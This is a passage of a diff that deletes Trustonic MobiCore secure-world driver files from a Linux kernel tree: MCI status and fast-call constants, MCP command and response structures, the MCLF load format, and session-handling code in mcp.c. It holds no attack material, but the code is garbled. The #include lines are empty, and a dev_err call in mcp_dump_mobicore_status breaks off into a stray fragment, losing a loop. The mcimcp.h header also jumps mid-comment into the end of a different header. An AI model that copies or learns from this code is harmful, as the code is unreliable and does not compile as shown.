-- * MobiCore status information.
-- * @{ */
--/**< MobiCore is not yet initialized. FastCall FcInit() to set up MobiCore.*/
--#define MC_STATUS_NOT_INITIALIZED 0
--/**< Bad parameters have been passed in FcInit(). */
--#define MC_STATUS_BAD_INIT 1
--/**< MobiCore did initialize properly. */
--#define MC_STATUS_INITIALIZED 2
--/**< MobiCore kernel halted due to an unrecoverable exception. Further
-- * information is available extended info */
--#define MC_STATUS_HALT 3
--/** @} */
--
--/** @name Extended Info Identifiers
-- * Extended info parameters for MC_FC_INFO to obtain further information depending on MobiCore state.
-- * @{ */
--/**< Version of the MobiCore Control Interface (MCI) */
--#define MC_EXT_INFO_ID_MCI_VERSION 0
--/**< MobiCore control flags */
--#define MC_EXT_INFO_ID_FLAGS 1
--/**< MobiCore halt condition code */
--#define MC_EXT_INFO_ID_HALT_CODE 2
--/**< MobiCore halt condition instruction pointer */
--#define MC_EXT_INFO_ID_HALT_IP 3
--/**< MobiCore fault counter */
--#define MC_EXT_INFO_ID_FAULT_CNT 4
--/**< MobiCore last fault cause */
--#define MC_EXT_INFO_ID_FAULT_CAUSE 5
--/**< MobiCore last fault meta */
--#define MC_EXT_INFO_ID_FAULT_META 6
--/**< MobiCore last fault threadid */
--#define MC_EXT_INFO_ID_FAULT_THREAD 7
--/**< MobiCore last fault instruction pointer */
--#define MC_EXT_INFO_ID_FAULT_IP 8
--/**< MobiCore last fault stack pointer */
--#define MC_EXT_INFO_ID_FAULT_SP 9
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_DFSR 10
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_ADFSR 11
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_DFAR 12
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_IFSR 13
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_AIFSR 14
--/**< MobiCore last fault ARM arch information */
--#define MC_EXT_INFO_ID_FAULT_ARCH_IFAR 15
--/**< MobiCore configured by Daemon via fc_init flag */
--#define MC_EXT_INFO_ID_MC_CONFIGURED 16
--/**< MobiCore scheduling status: idle/non-idle */
--#define MC_EXT_INFO_ID_MC_SCHED_STATUS 17
--/**< MobiCore runtime status: initialized, halted */
--#define MC_EXT_INFO_ID_MC_STATUS 18
--/**< MobiCore exception handler last partner */
--#define MC_EXT_INFO_ID_MC_EXC_PARTNER 19
--/**< MobiCore exception handler last peer */
--#define MC_EXT_INFO_ID_MC_EXC_IPCPEER 20
--/**< MobiCore exception handler last IPC message */
--#define MC_EXT_INFO_ID_MC_EXC_IPCMSG 21
--/**< MobiCore exception handler last IPC data */
--#define MC_EXT_INFO_ID_MC_EXC_IPCDATA 22
--/**< MobiCore exception handler last UUID (uses 4 slots: 23 to 26) */
--#define MC_EXT_INFO_ID_MC_EXC_UUID 23
--#define MC_EXT_INFO_ID_MC_EXC_UUID1 24
--#define MC_EXT_INFO_ID_MC_EXC_UUID2 25
--#define MC_EXT_INFO_ID_MC_EXC_UUID3 26
--
--/** @} */
--
--/** @name FastCall return values
-- * Return values of the MobiCore FastCalls.
-- * @{ */
--/**< No error. Everything worked fine. */
--#define MC_FC_RET_OK 0
--/**< FastCall was not successful. */
--#define MC_FC_RET_ERR_INVALID 1
--/**< MobiCore has already been initialized. */
--#define MC_FC_RET_ERR_ALREADY_INITIALIZED 5
--/** @} */
--
--#endif /** MCIFC_H_ */
--
--/** @} */
-diff --git a/drivers/gud/MobiCoreDriver/mci/mcimcp.h b/drivers/gud/MobiCoreDriver/mci/mcimcp.h
-deleted file mode 100644
-index 3eb2efea2c30c..0000000000000
---- a/drivers/gud/MobiCoreDriver/mci/mcimcp.h
-+++ /dev/null
-@@ -1,508 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef MCP_H_
--#define MCP_H_
--
--#include "mci/mcloadformat.h"
--
--/** Indicates a response */
--#define FLAG_RESPONSE BIT(31)
--
--/** Maximum number of buffers that can be mapped at once */
--#define MCP_MAP_MAX_BUF 4
--
--/** MobiCore Return Code Defines.
-- * List of the possible MobiCore return codes.
-- */
--enum mcp_result {
-- /** Memory has successfully been mapped */
-- MC_MCP_RET_OK = 0,
-- /** The session ID is invalid */
-- MC_MCP_RET_ERR_INVALID_SESSION = 1,
-- /** The UUID of the Trustlet is unknown */
-- MC_MCP_RET_ERR_UNKNOWN_UUID = 2,
-- /** The ID of the driver is unknown */
-- MC_MCP_RET_ERR_UNKNOWN_DRIVER_ID = 3,
-- /** No more session are allowed */
-- MC_MCP_RET_ERR_NO_MORE_SESSIONS = 4,
-- /** The container is invalid */
-- MC_MCP_RET_ERR_CONTAINER_INVALID = 5,
-- /** The Trustlet is invalid */
-- MC_MCP_RET_ERR_TRUSTLET_INVALID = 6,
-- /** The memory block has already been mapped before */
-- MC_MCP_RET_ERR_ALREADY_MAPPED = 7,
-- /** Alignment or length error in the command parameters */
-- MC_MCP_RET_ERR_INVALID_PARAM = 8,
-- /** No space left in the virtual address space of the session */
-- MC_MCP_RET_ERR_OUT_OF_RESOURCES = 9,
-- /** WSM type unknown or broken WSM */
-- MC_MCP_RET_ERR_INVALID_WSM = 10,
-- /** unknown error */
-- MC_MCP_RET_ERR_UNKNOWN = 11,
-- /** Length of map invalid */
-- MC_MCP_RET_ERR_INVALID_MAPPING_LENGTH = 12,
-- /** Map can only be applied to Trustlet session */
-- MC_MCP_RET_ERR_MAPPING_TARGET = 13,
-- /** Couldn't open crypto session */
-- MC_MCP_RET_ERR_OUT_OF_CRYPTO_RESOURCES = 14,
-- /** System Trustlet signature verification failed */
-- MC_MCP_RET_ERR_SIGNATURE_VERIFICATION_FAILED = 15,
-- /** System Trustlet public key is wrong */
-- MC_MCP_RET_ERR_WRONG_PUBLIC_KEY = 16,
-- /** Wrong containter type(s) */
-- MC_MCP_RET_ERR_CONTAINER_TYPE_MISMATCH = 17,
-- /** Container is locked (or not activated) */
-- MC_MCP_RET_ERR_CONTAINER_LOCKED = 18,
-- /** SPID is not registered with root container */
-- MC_MCP_RET_ERR_SP_NO_CHILD = 19,
-- /** UUID is not registered with sp container */
-- MC_MCP_RET_ERR_TL_NO_CHILD = 20,
-- /** Unwrapping of root container failed */
-- MC_MCP_RET_ERR_UNWRAP_ROOT_FAILED = 21,
-- /** Unwrapping of service provider container failed */
-- MC_MCP_RET_ERR_UNWRAP_SP_FAILED = 22,
-- /** Unwrapping of Trustlet container failed */
-- MC_MCP_RET_ERR_UNWRAP_TRUSTLET_FAILED = 23,
-- /** Container version mismatch */
-- MC_MCP_RET_ERR_CONTAINER_VERSION_MISMATCH = 24,
-- /** Decryption of service provider trustlet failed */
-- MC_MCP_RET_ERR_SP_TL_DECRYPTION_FAILED = 25,
-- /** Hash check of service provider trustlet failed */
-- MC_MCP_RET_ERR_SP_TL_HASH_CHECK_FAILED = 26,
-- /** Activation/starting of task failed */
-- MC_MCP_RET_ERR_LAUNCH_TASK_FAILED = 27,
-- /** Closing of task not yet possible, try again later */
-- MC_MCP_RET_ERR_CLOSE_TASK_FAILED = 28,
-- /**< Service is blocked and a session cannot be opened to it */
-- MC_MCP_RET_ERR_SERVICE_BLOCKED = 29,
-- /**< Service is locked and a session cannot be opened to it */
-- MC_MCP_RET_ERR_SERVICE_LOCKED = 30,
-- /**< Service was forcefully killed (due to an administrative command) */
-- MC_MCP_RET_ERR_SERVICE_KILLED = 31,
-- /** The command is unknown */
-- MC_MCP_RET_ERR_UNKNOWN_COMMAND = 50,
-- /** The command data is invalid */
-- MC_MCP_RET_ERR_INVALID_DATA = 51
--};
--
--/** Possible MCP Command IDs
-- * Command ID must be between 0 and 0x7FFFFFFF.
-- */
--enum cmd_id {
-- /** Invalid command ID */
-- MC_MCP_CMD_ID_INVALID = 0x00,
-- /** Open a session */
-- MC_MCP_CMD_OPEN_SESSION = 0x01,
-- /** Close an existing session */
-- MC_MCP_CMD_CLOSE_SESSION = 0x03,
-- /** Map WSM to session */
-- MC_MCP_CMD_MAP = 0x04,
-- /** Unmap WSM from session */
-- MC_MCP_CMD_UNMAP = 0x05,
-- /** Prepare for suspend */
-- MC_MCP_CMD_SUSPEND = 0x06,
-- /** Resume from suspension */
-- MC_MCP_CMD_RESUME = 0x07,
-- /** Get MobiCore version information */
-- MC_MCP_CMD_GET_MOBICORE_VERSION = 0x09,
-- /** Close MCP and unmap MCI */
-- MC_MCP_CMD_CLOSE_MCP = 0x0A,
-- /** Load token for device attestation */
-- MC_MCP_CMD_LOAD_TOKEN = 0x0B,
-- /** Check that TA can be loaded */
-- MC_MCP_CMD_CHECK_LOAD_TA = 0x0C,
-- /** Map multiple WSMs to session */
-- MC_MCP_CMD_MULTIMAP = 0x0D,
-- /** Unmap multiple WSMs to session */
-- MC_MCP_CMD_MULTIUNMAP = 0x0E,
--};
--
--/*
-- * Types of WSM known to the MobiCore.
-- */
--#define WSM_TYPE_MASK 0xFF
--#define WSM_INVALID 0 /** Invalid memory type */
--#define WSM_L2 2 /** Buffer mapping uses L2/L3 table */
--#define WSM_L1 3 /** Buffer mapping uses fake L1 table */
--
--/** Magic number used to identify if Open Command supports GP client
-- * authentication.
-- */
--#define MC_GP_CLIENT_AUTH_MAGIC 0x47504131 /* "GPA1" */
--
--/** Command header.
-- * It just contains the command ID. Only values specified in cmd_id are
-- * allowed as command IDs. If the command ID is unspecified the MobiCore
-- * returns an empty response with the result set to
-- * MC_MCP_RET_ERR_UNKNOWN_COMMAND.
-- */
--struct cmd_header {
-- enum cmd_id cmd_id; /** Command ID of the command */
--};
--
--/** Response header.
-- * MobiCore will reply to every MCP command with an MCP response. Like the MCP
-- * command the response consists of a header followed by response data. The
-- * response is written to the same memory location as the MCP command.
-- */
--struct rsp_header {
-- uint32_t rsp_id; /** Command ID | FLAG_RESPONSE */
-- enum mcp_result result; /** Result of the command execution */
--};
--
--/** @defgroup CMD MCP Commands
-- */
--
--/** @defgroup ASMCMD Administrative Commands
-- */
--
--/** @defgroup MCPGETMOBICOREVERSION GET_MOBICORE_VERSION
-- * Get MobiCore version info.
-- *
-- */
--
--/** Get MobiCore Version Command */
--struct cmd_get_version {
-- struct cmd_header cmd_header; /** Command header */
--};
--
--/** Get MobiCore Version Command Response */
--struct rsp_get_version {
-- struct rsp_header rsp_header; /** Response header */
-- struct mc_version_info version_info; /** MobiCore version info */
--};
--
--/** @defgroup POWERCMD Power Management Commands
-- */
--
--/** @defgroup MCPSUSPEND SUSPEND
-- * Prepare MobiCore suspension.
-- * This command allows MobiCore and MobiCore drivers to release or clean
-- * resources and save device state.
-- *
-- */
--
--/** Suspend Command */
--struct cmd_suspend {
-- struct cmd_header cmd_header; /** Command header */
--};
--
--/** Suspend Command Response */
--struct rsp_suspend {
-- struct rsp_header rsp_header; /** Response header */
--};
--
--/** @defgroup MCPRESUME RESUME
-- * Resume MobiCore from suspension.
-- * This command allows MobiCore and MobiCore drivers to reinitialize hardware
-- * affected by suspension.
-- *
-- */
--
--/** Resume Command */
--struct cmd_resume {
-- struct cmd_header cmd_header; /** Command header */
--};
--
--/** Resume Command Response */
--struct rsp_resume {
-- struct rsp_header rsp_header; /** Response header */
--};
--
--/** @defgroup SESSCMD Session Management Commands
-- */
--
--/** @defgroup MCPOPEN OPEN
-- * Load and open a session to a Trustlet.
-- * The OPEN command loads Trustlet data to the MobiCore context and opens a
-- * session to the Trustlet. If wsm_data_type is WSM_INVALID MobiCore tries to
-- * start a pre-installed Trustlet associated with the uuid passed. The uuid
-- * passed must match the uuid contained in the load data (if available).
-- * On success, MobiCore returns the session ID which can be used for further
-- * communication.
-- */
--
--/** GP client authentication data */
--struct cmd_open_data {
-- uint32_t mclf_magic; /** ASCII "MCLF" on older versions */
-- struct identity identity; /** Login method and data */
--};
--
--/** Open Command */
--struct cmd_open {
-- struct cmd_header cmd_header; /** Command header */
-- struct mc_uuid_t uuid; /** Service UUID */
-- uint8_t unused[4]; /** Padding to be 64-bit aligned */
-- uint64_t adr_tci_buffer; /** Physical address of the TCI MMU */
-- uint64_t adr_load_data; /** Physical address of the data MMU */
-- uint32_t ofs_tci_buffer; /** Offset to the data */
-- uint32_t len_tci_buffer; /** Length of the TCI */
-- uint32_t wsmtype_tci; /** Type of WSM used for the TCI */
-- uint32_t wsm_data_type; /** Type of MMU */
-- uint32_t ofs_load_data; /** Offset to the data */
-- uint32_t len_load_data; /** Length of the data to load */
-- union {
-- struct cmd_open_data cmd_open_data; /** Client login data */
-- union mclf_header tl_header; /** Service header */
-- };
-- uint32_t is_gpta; /** true if looking for an SD/GP-TA */
--};
--
--/** Open Command Response */
--struct rsp_open {
-- struct rsp_header rsp_header; /** Response header */
-- uint32_t session_id; /** Session ID */
--};
--
--/** TA Load Check Command */
--struct cmd_check_load {
-- struct cmd_header cmd_header; /** Command header */
-- struct mc_uuid_t uuid; /** Service UUID */
-- uint64_t adr_load_data; /** Physical address of the data */
-- uint32_t wsm_data_type; /** Type of MMU */
-- uint32_t ofs_load_data; /** Offset to the data */
-- uint32_t len_load_data; /** Length of the data to load */
-- union mclf_header tl_header; /** Service header */
--};
--
--/** TA Load Check Response */
--struct rsp_check_load {
-- struct rsp_header rsp_header; /** Response header */
--};
--
--/** @defgroup MCPCLOSE CLOSE
-- * Close an existing session to a Trustlet.
-- * The CLOSE command terminates a session and frees all resources in the
-- * MobiCore system which are currently occupied by the session. Before closing
-- * the session, the MobiCore runtime management waits until all pending
-- * operations, like calls to drivers, invoked by the Trustlet have been
-- * terminated. Mapped memory will automatically be unmapped from the MobiCore
-- * context. The NWd is responsible for processing the freed memory according to
-- * the Rich-OS needs.
-- *
-- */
--
--/** Close Command */
--struct cmd_close {
-- struct cmd_header cmd_header; /** Command header */
-- uint32_t session_id; /** Session ID */
--};
--
--/** Close Command Response */
--struct rsp_close {
-- struct rsp_header rsp_header; /** Response header */
--};
--
--/** @defgroup MCPMAP MAP
-- * Map a portion of memory to a session.
-- * The MAP command provides a block of memory to the context of a service.
-- * The memory then becomes world-shared memory (WSM).
-- * The only allowed memory type here is WSM_L2.
-- */
--
--/** Map Command */
--struct cmd_map {
-- struct cmd_header cmd_header; /** Command header */
-- uint32_t session_id; /** Session ID */
-- uint32_t wsm_type; /** Type of MMU */
-- uint32_t ofs_buffer; /** Offset to the payload */
-- uint64_t adr_buffer; /** Physical address of the MMU */
-- uint32_t len_buffer; /** Length of the buffer */
--};
--
--#define MCP_MAP_MAX 0x100000 /** Maximum length for MCP map */
--
--/** Map Command Response */
--struct rsp_map {
-- struct rsp_header rsp_header; /** Response header */
-- /** Virtual address the WSM is mapped to, may include an offset! */
-- uint32_t secure_va;
--};
--
--/** @defgroup MCPUNMAP UNMAP
-- * Unmap a portion of world-shared memory from a session.
-- * The UNMAP command is used to unmap a previously mapped block of
-- * world shared memory from the context of a session.
-- * -- * Attention: The memory block will be immediately unmapped from the specified -- * session. If the service is still accessing the memory, the service will -- * trigger a segmentation fault. -- */ -- --/** Unmap Command */ --struct cmd_unmap { -- struct cmd_header cmd_header; /** Command header */ -- uint32_t session_id; /** Session ID */ -- uint32_t wsm_type; /** Type of WSM used of the memory */ -- /** Virtual address the WSM is mapped to, may include an offset! */ -- uint32_t secure_va; -- uint32_t virtual_buffer_len; /** Length of virtual buffer */ --}; -- --/** Unmap Command Response */ --struct rsp_unmap { -- struct rsp_header rsp_header; /** Response header */ --}; -- --/** @defgroup MCPLOADTOKEN -- * Load a token from the normal world and share it with type of -- * function. elementCnt must be a power of two and the power needs -- * to be smaller than power of uint32_t (obviously 32). -- */ --struct notification_queue { -- struct notification_queue_header hdr; /** Queue header */ -- struct notification notification[MIN_NQ_ELEM]; /** Elements */ --}; -- --#endif /** NQ_H_ */ -diff --git a/drivers/gud/MobiCoreDriver/mci/mcloadformat.h b/drivers/gud/MobiCoreDriver/mci/mcloadformat.h -deleted file mode 100644 -index f12f618bb0dc6..0000000000000 ---- a/drivers/gud/MobiCoreDriver/mci/mcloadformat.h -+++ /dev/null -@@ -1,134 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. 
-- */
--#ifndef MCLOADFORMAT_H_
--#define MCLOADFORMAT_H_
--
--/** Trustlet Blob length info */
--#define MC_TLBLOBLEN_MAGIC 0x7672746C /* Magic for SWd: vrtl */
--#define MAX_SO_CONT_SIZE 512 /* Max size for a container */
--
--/** MCLF flags */
--/**< Loaded service cannot be unloaded from MobiCore. */
--#define MC_SERVICE_HEADER_FLAGS_PERMANENT BIT(0)
--/**< Service has no WSM control interface. */
--#define MC_SERVICE_HEADER_FLAGS_NO_CONTROL_INTERFACE BIT(1)
--/**< Service can be debugged. */
--#define MC_SERVICE_HEADER_FLAGS_DEBUGGABLE BIT(2)
--/**< New-layout trusted application or trusted driver. */
--#define MC_SERVICE_HEADER_FLAGS_EXTENDED_LAYOUT BIT(3)
--
--/** Service type.
-- * The service type defines the type of executable.
-- */
--enum service_type {
-- SERVICE_TYPE_ILLEGAL = 0,
-- SERVICE_TYPE_DRIVER = 1,
-- SERVICE_TYPE_SP_TRUSTLET = 2,
-- SERVICE_TYPE_SYSTEM_TRUSTLET = 3,
-- SERVICE_TYPE_MIDDLEWARE = 4,
-- SERVICE_TYPE_LAST_ENTRY = 5,
--};
--
--/**
-- * Descriptor for a memory segment.
-- */
--struct segment_descriptor {
-- uint32_t start; /**< Virtual start address */
-- uint32_t len; /**< Segment length in bytes */
--};
--
--/**
-- * MCLF intro for data structure identification.
-- * Must be the first element of a valid MCLF file.
-- */
--struct mclf_intro {
-- uint32_t magic; /**< Header magic value ASCII "MCLF" */
-- uint32_t version; /**< Version the MCLF header struct */
--};
--
--/**
-- * @defgroup MCLF_VER_V2 MCLF Version 32
-- * @ingroup MCLF_VER
-- *
-- * @addtogroup MCLF_VER_V2
-- */
--
--/*
-- * GP TA identity.
-- */
--struct identity {
-- /**< GP TA login type */
-- uint32_t login_type;
-- /**< GP TA login data */
-- uint8_t login_data[16];
--};
--
--/**
-- * Version 2.1/2.2 MCLF header.
-- */
--struct mclf_header_v2 {
-- /**< MCLF header start with the mandatory intro */
-- struct mclf_intro intro;
-- /**< Service flags */
-- uint32_t flags;
-- /**< Type of memory the service must be executed from */
-- uint32_t mem_type;
-- /**< Type of service */
-- enum service_type service_type;
-- /**< Number of instances which can be run simultaneously */
-- uint32_t num_instances;
-- /**< Loadable service unique identifier (UUID) */
-- struct mc_uuid_t uuid;
-- /**< If the service_type is SERVICE_TYPE_DRIVER the Driver ID is used */
-- uint32_t driver_id;
-- /**<
-- * Number of threads (N) in a service:
-- * SERVICE_TYPE_SP_TRUSTLET: N = 1
-- * SERVICE_TYPE_SYSTEM_TRUSTLET: N = 1
-- * SERVICE_TYPE_DRIVER: N >= 1
-- */
-- uint32_t num_threads;
-- /**< Virtual text segment */
-- struct segment_descriptor text;
-- /**< Virtual data segment */
-- struct segment_descriptor data;
-- /**< Length of the BSS segment in bytes. MUST be at least 8 byte */
-- uint32_t bss_len;
-- /**< Virtual start address of service code */
-- uint32_t entry;
-- /**< Version of the interface the driver exports */
-- uint32_t service_version;
--};
--
--/**
-- * @addtogroup MCLF
-- */
--
--/** MCLF header */
--union mclf_header {
-- /**< Intro for data identification */
-- struct mclf_intro intro;
-- /**< Version 2 header */
-- struct mclf_header_v2 mclf_header_v2;
--};
--
--struct mc_blob_len_info {
-- uint32_t magic; /**< New blob format magic number */
-- uint32_t root_size; /**< Root container size */
-- uint32_t sp_size; /**< SP container size */
-- uint32_t ta_size; /**< TA container size */
-- uint32_t reserved[4]; /**< Reserved for further Use */
--};
--
--#endif /* MCLOADFORMAT_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mcp.c b/drivers/gud/MobiCoreDriver/mcp.c
-deleted file mode 100644
-index 693fd42e2d4b5..0000000000000
---- a/drivers/gud/MobiCoreDriver/mcp.c
-+++ /dev/null
-@@ -1,1067 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--
--#include "public/mc_linux.h"
--#include "public/mc_admin.h"
--
--#include "mci/mcimcp.h"
--#include "mci/mcifc.h"
--#include "mci/mcinq.h" /* SID_MCP */
--
--#include "platform.h" /* IRQ number */
--#include "fastcall.h"
--#include "debug.h"
--#include "logging.h"
--#include "mcp.h"
--
--/* respond timeout for MCP notification, in secs */
--#define MCP_TIMEOUT 10
--#define MCP_RETRIES 5
--#define MCP_NF_QUEUE_SZ 8
--#define NQ_NUM_ELEMS 16
--
--static void mc_irq_worker(struct work_struct *data);
--DECLARE_WORK(irq_work, mc_irq_worker);
--
--static const struct {
-- unsigned int index;
-- const char *msg;
--} status_map[] = {
-- /**< MobiCore control flags */
-- { MC_EXT_INFO_ID_FLAGS, "flags"},
-- /**< MobiCore halt condition code */
-- { MC_EXT_INFO_ID_HALT_CODE, "haltCode"},
-- /**< MobiCore halt condition instruction pointer */
-- { MC_EXT_INFO_ID_HALT_IP, "haltIp"},
-- /**< MobiCore fault counter */
-- { MC_EXT_INFO_ID_FAULT_CNT, "faultRec.cnt"},
-- /**< MobiCore last fault cause */
-- { MC_EXT_INFO_ID_FAULT_CAUSE, "faultRec.cause"},
-- /**< MobiCore last fault meta */
-- { MC_EXT_INFO_ID_FAULT_META, "faultRec.meta"},
-- /**< MobiCore last fault threadid */
-- { MC_EXT_INFO_ID_FAULT_THREAD, "faultRec.thread"},
-- /**< MobiCore last fault instruction pointer */
-- { MC_EXT_INFO_ID_FAULT_IP, "faultRec.ip"},
-- /**< MobiCore last fault stack pointer */
-- { MC_EXT_INFO_ID_FAULT_SP, "faultRec.sp"},
-- /**< MobiCore last fault ARM arch information */
-- { MC_EXT_INFO_ID_FAULT_ARCH_DFSR, "faultRec.arch.dfsr"},
-- /**< MobiCore last fault ARM arch information */
-- { MC_EXT_INFO_ID_FAULT_ARCH_ADFSR, "faultRec.arch.adfsr"},
-- /**< MobiCore last fault ARM arch information */
-- { MC_EXT_INFO_ID_FAULT_ARCH_DFAR, "faultRec.arch.dfar"},
-- /**< MobiCore last fault ARM arch information */
-- { MC_EXT_INFO_ID_FAULT_ARCH_IFSR, "faultRec.arch.ifsr"},
-- /**< MobiCore last fault ARM arch information */
-- { MC_EXT_INFO_ID_FAULT_ARCH_AIFSR, "faultRec.arch.aifsr"},
-- /**< MobiCore last fault ARM arch information */
-- { MC_EXT_INFO_ID_FAULT_ARCH_IFAR, "faultRec.arch.ifar"},
-- /**< MobiCore configured by Daemon via fc_init flag */
-- { MC_EXT_INFO_ID_MC_CONFIGURED, "mcData.flags"},
-- /**< MobiCore exception handler last partner */
-- { MC_EXT_INFO_ID_MC_EXC_PARTNER, "mcExcep.partner"},
-- /**< MobiCore exception handler last peer */
-- { MC_EXT_INFO_ID_MC_EXC_IPCPEER, "mcExcep.peer"},
-- /**< MobiCore exception handler last IPC message */
-- { MC_EXT_INFO_ID_MC_EXC_IPCMSG, "mcExcep.cause"},
-- /**< MobiCore exception handler last IPC data */
-- {MC_EXT_INFO_ID_MC_EXC_IPCDATA, "mcExcep.meta"},
--};
--
--static struct mcp_context {
-- struct mutex buffer_lock; /* Lock on SWd communication buffer */
-- struct mutex queue_lock; /* Lock for MCP messages */
-- struct mcp_buffer *mcp_buffer;
-- struct tbase_session *session;
-- struct completion complete;
-- bool mcp_dead;
-- int irq;
-- int (*scheduler_cb)(enum mcp_scheduler_commands);
-- void (*crashhandler_cb)(void);
-- /* MobiCore MCI information */
-- unsigned int order;
-- union {
-- void *base;
-- struct {
-- struct notification_queue *tx;
-- struct notification_queue *rx;
-- } nq;
-- };
-- /*
-- * This notifications list is to be used to queue notifications when the
-- * notification queue overflows, so no session gets its notification
-- * lost, especially MCP.
-- */ -- struct mutex notifications_mutex; -- struct list_head notifications; -- struct mcp_session mcp_session; /* Pseudo session for MCP */ -- /* Unexpected notification (during MCP open) */ -- struct mutex unexp_notif_mutex; -- struct notification unexp_notif; -- /* Sessions */ -- struct mutex sessions_lock; -- struct list_head sessions; -- /* Dump buffer */ -- struct kasnprintf_buf dump; --} mcp_ctx; -- --static inline void mark_mcp_dead(void) --{ -- mcp_ctx.mcp_dead = true; -- complete(&mcp_ctx.complete); --} -- --static inline int mcp_set_sleep_mode_rq(uint16_t sleep_req) --{ -- mutex_lock(&mcp_ctx.buffer_lock); -- mcp_ctx.mcp_buffer->mc_flags.sleep_mode.sleep_req = sleep_req; -- mutex_unlock(&mcp_ctx.buffer_lock); -- return 0; --} -- --static ssize_t debug_crashdump_read(struct file *file, char __user *user_buf, -- size_t count, loff_t *ppos) --{ -- if (mcp_ctx.dump.off) -- return simple_read_from_buffer(user_buf, count, ppos, -- mcp_ctx.dump.buf, -- mcp_ctx.dump.off); -- -- return 0; --} -- --static const struct file_operations mc_debug_crashdump_ops = { -- .read = debug_crashdump_read, -- .llseek = default_llseek, --}; -- --static void mcp_dump_mobicore_status(void) --{ -- char uuid_str[33]; -- int ret = 0; -- int i; -- -- if (mcp_ctx.dump.off) -- ret = -EBUSY; -- -- /* read additional info about exception-point and print */ -- dev_err(g_ctx.mcd, "= 0) -- ret = kasnprintf(&mcp_ctx.dump, -- "%-20s= 0x%08x\n", -- status_map[i].msg, info); -- } -- } -- -- /* construct UUID string */ -- for (i = 0; i < 4; i++) { -- uint32_t info; -- int j; -- -- if (mc_fc_info(MC_EXT_INFO_ID_MC_EXC_UUID + i, NULL, &info)) -- return; -- -- for (j = 0; j < sizeof(info); j++) { -- snprintf(&uuid_str[(i * sizeof(info) + j) * 2], 3, -- "%02x", (info >> (j * 8)) & 0xff); -- } -- } -- -- dev_err(g_ctx.mcd, " %-20s= 0x%s\n", "mcExcep.uuid", uuid_str); -- if (ret >= 0) -- ret = kasnprintf(&mcp_ctx.dump, "%-20s= 0x%s\n", "mcExcep.uuid", -- uuid_str); -- -- if (ret < 0) { -- 
kfree(mcp_ctx.dump.buf); -- mcp_ctx.dump.off = 0; -- return; -- } -- -- debugfs_create_file("crashdump", 0400, g_ctx.debug_dir, NULL, -- &mc_debug_crashdump_ops); -- if (mcp_ctx.crashhandler_cb) -- mcp_ctx.crashhandler_cb(); --} -- --void mcp_session_init(struct mcp_session *session, bool is_gp, -- const struct identity *identity) --{ -- /* close_work is initialized by the caller */ -- INIT_LIST_HEAD(&session->list); -- INIT_LIST_HEAD(&session->notifications_list); -- mutex_init(&session->notif_wait_lock); -- init_completion(&session->completion); -- mutex_init(&session->exit_code_lock); -- session->state = MCP_SESSION_RUNNING; -- session->is_gp = is_gp; -- if (is_gp) -- session->identity = *identity; --} -- --static inline bool mcp_session_isrunning(struct mcp_session *session) --{ -- bool ret; -- -- mutex_lock(&mcp_ctx.sessions_lock); -- ret = session->state == MCP_SESSION_RUNNING; -- mutex_unlock(&mcp_ctx.sessions_lock); -- return ret; --} -- --/* -- * session remains valid thanks to the upper layers reference counters, but the -- * SWd session may have died, in which case we are informed. 
-- */
--int mcp_session_waitnotif(struct mcp_session *session, int32_t timeout)
--{
-- int ret = 0;
--
-- mutex_lock(&session->notif_wait_lock);
-- if (!mcp_session_isrunning(session)) {
-- ret = -ENXIO;
-- goto end;
-- }
--
-- if (mcp_session_exitcode(session)) {
-- ret = -ECOMM;
-- goto end;
-- }
--
-- if (timeout < 0) {
-- ret = wait_for_completion_interruptible(&session->completion);
-- if (ret)
-- goto end;
-- } else {
-- ret = wait_for_completion_interruptible_timeout(
-- &session->completion, timeout * HZ / 1000);
-- if (ret < 0)
-- /* Interrupted */
-- goto end;
--
-- if (!ret) {
-- /* Timed out */
-- ret = -ETIME;
-- goto end;
-- }
--
-- ret = 0;
-- }
--
-- if (mcp_session_exitcode(session)) {
-- ret = -ECOMM;
-- goto end;
-- }
--
-- if (!mcp_session_isrunning(session)) {
-- ret = -ENXIO;
-- goto end;
-- }
--
--end:
-- mutex_unlock(&session->notif_wait_lock);
-- if (ret)
-- dev_info(g_ctx.mcd, "%s session %x ec %d ret %d\n", __func__,
-- session->id, session->exit_code, ret);
--
-- return ret;
--}
--
--int32_t mcp_session_exitcode(struct mcp_session *session)
--{
-- int32_t exit_code;
--
-- mutex_lock(&session->exit_code_lock);
-- exit_code = session->exit_code;
-- mutex_unlock(&session->exit_code_lock);
-- if (exit_code)
-- dev_info(g_ctx.mcd, "%s session %x ec %d\n", __func__,
-- session->id, exit_code);
--
-- return exit_code;
--}
--
--int mcp_suspend(void)
--{
